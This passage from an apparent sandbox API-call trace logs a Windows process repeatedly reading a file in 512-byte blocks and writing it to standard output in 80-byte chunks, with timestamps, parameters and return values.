(_FileHandle=1) returned 0x50 [0146.613] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 
[0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.614] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.614] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 
[0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.615] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.615] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, 
lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.617] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.617] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType 
(hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.618] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.618] GetFileType (hFile=0x50) returned 0x1 [0146.618] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.618] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] GetFileType (hFile=0x50) returned 0x1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] GetFileType (hFile=0x50) returned 0x1 [0146.633] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.633] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.633] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, 
lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.635] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.635] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: 
hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.636] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.636] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.636] GetFileType (hFile=0x50) returned 0x1 [0146.636] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 
[0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.637] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.637] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.637] GetFileType (hFile=0x50) returned 0x1 [0146.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] GetFileType (hFile=0x50) returned 0x1 [0146.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.638] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, 
